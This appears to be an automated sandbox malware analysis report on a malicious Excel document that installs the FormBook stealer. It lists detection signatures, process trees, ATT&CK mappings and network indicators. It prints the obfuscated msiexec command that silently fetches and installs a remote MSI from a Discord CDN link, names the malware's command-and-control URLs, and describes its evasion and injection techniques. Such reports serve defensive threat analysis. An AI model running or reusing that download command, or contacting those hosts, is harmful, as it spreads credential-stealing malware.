          Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@12/4@6/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCBB7.tmpJump to behavior
          Source: 0d69e4f6_by_Libranalysis.xlsOLE indicator, Workbook stream: true
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 0d69e4f6_by_Libranalysis.xlsReversingLabs: Detection: 38%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: unknownProcess created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn Jump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmpJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'Jump to behavior
          Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wininit.pdb source: MSID8B1.tmp, 00000007.00000003.2147755225.0000000000520000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSID8B1.tmp, wininit.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Windows\Installer\MSID8B1.tmpUnpacked PE file: 7.2.MSID8B1.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
          Source: 0d69e4f6_by_Libranalysis.xlsStream path '_VBA_PROJECT_CUR/VBA/AK2_oiMjTt8L' : High number of string operations
          Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module AK2_oiMjTt8LName: AK2_oiMjTt8L
          Obfuscated command line foundShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn Jump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FDFA1 push ecx; ret 7_2_008FDFB4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FDFA1 push ecx; ret 9_2_021FDFB4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00096608 push esp; iretd 9_2_00096609
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_000998E6 pushad ; ret 9_2_000998EA
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00097AA0 push 00FCAB15h; ret 9_2_00097AA6
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009CEA5 push eax; ret 9_2_0009CEF8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009CEFB push eax; ret 9_2_0009CF62
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009CEF2 push eax; ret 9_2_0009CEF8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009CF5C push eax; ret 9_2_0009CF62
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00096FE8 push ss; retf 9_2_00096FE9
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024EE3E6 pushad ; ret 9_2_024EE3E7
          Source: C:\Windows\Installer\MSID8B1.tmpFile created: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Installer\MSID8B1.tmpRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Installer\MSID8B1.tmpRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 0000000000089B4E second address: 0000000000089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00940101 rdtsc 7_2_00940101
          Source: C:\Windows\System32\msiexec.exe TID: 2944Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\msiexec.exe TID: 2944Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2336Thread sleep time: -54000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exe TID: 2264Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000008.00000002.2343968360.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2111770353.000000000842E000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000008.00000000.2106036941.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000008.00000000.2111770353.000000000842E000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: MSID8B1.tmp, 00000006.00000002.2096256432.0000000000534000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000008.00000002.2344004696.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Windows\Installer\MSID8B1.tmpProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00940101 rdtsc 7_2_00940101
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk,7_2_008F00C4
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 6_2_10001000 mov eax, dword ptr fs:[00000030h]6_2_10001000
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 6_2_005015DB mov eax, dword ptr fs:[00000030h]6_2_005015DB
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 6_2_005017F3 mov eax, dword ptr fs:[00000030h]6_2_005017F3
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009026F8 mov eax, dword ptr fs:[00000030h]7_2_009026F8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022026F8 mov eax, dword ptr fs:[00000030h]9_2_022026F8
          Source: C:\Windows\Installer\MSID8B1.tmpProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 6_2_1000144A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_1000144A

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.duoteshop.com
          Source: C:\Windows\explorer.exeDomain query: www.destek-taleplerimiz.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.adimadimingilizce.com
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80Jump to behavior
          DLL side loading technique detectedShow sources
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dllJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dllJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dllJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\Installer\MSID8B1.tmp protection: execute and read and writeJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Installer\MSID8B1.tmpThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Installer\MSID8B1.tmpThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Installer\MSID8B1.tmpSection unmapped: C:\Windows\SysWOW64\wininit.exe base address: 1D0000Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn Jump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmpJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp'Jump to behavior
          Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2343968360.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.2344162820.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter1DLL Side-Loading1Process Injection512Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting22Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information11NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information13Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 402839 Sample: 0d69e4f6_by_Libranalysis Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 32 www.111bjs.com 2->32 34 111bjs.com 2->34 36 cdn.discordapp.com 2->36 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 10 other signatures 2->50 9 MSID8B1.tmp 19 2->9         started        13 EXCEL.EXE 10 8 2->13         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\Temp\...\5rov.dll, PE32 9->30 dropped 60 Detected unpacking (changes PE section rights) 9->60 62 Maps a DLL or memory area into another process 9->62 64 DLL side loading technique detected 9->64 66 Tries to detect virtualization through RDTSC time measurements 9->66 15 MSID8B1.tmp 9->15         started        68 Obfuscated command line found 13->68 18 cmd.exe 13->18         started        signatures6 process7 signatures8 70 Modifies the context of a thread in another process (thread injection) 15->70 72 Maps a DLL or memory area into another process 15->72 74 Sample uses process hollowing technique 15->74 76 Queues an APC in another process (thread injection) 15->76 20 wininit.exe 15->20         started        23 explorer.exe 15->23 injected 26 msiexec.exe 18->26         started        process9 dnsIp10 52 Modifies the context of a thread in another process (thread injection) 20->52 54 Maps a DLL or memory area into another process 20->54 56 Tries to detect virtualization through RDTSC time measurements 20->56 28 cmd.exe 20->28         started        38 adimadimingilizce.com 192.0.78.25, 49166, 80 AUTOMATTICUS United States 23->38 40 www.destek-taleplerimiz.com 99.83.154.118, 49167, 80 AMAZON-02US United States 23->40 42 2 other IPs or domains 23->42 58 System process connects to network (likely due to code injection or exploit) 23->58 signatures11 process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0d69e4f6_by_Libranalysis.xls38%ReversingLabsDocument-Word.Trojan.Valyria
          0d69e4f6_by_Libranalysis.xls100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.MSID8B1.tmp.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.MSID8B1.tmp.710000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.1.MSID8B1.tmp.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.MSID8B1.tmp.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          6.0.MSID8B1.tmp.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          7.0.MSID8B1.tmp.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          www.111bjs.com/ccr/100%Avira URL Cloudmalware
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn0%Avira URL Cloudsafe
          http://www.destek-taleplerimiz.com/ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
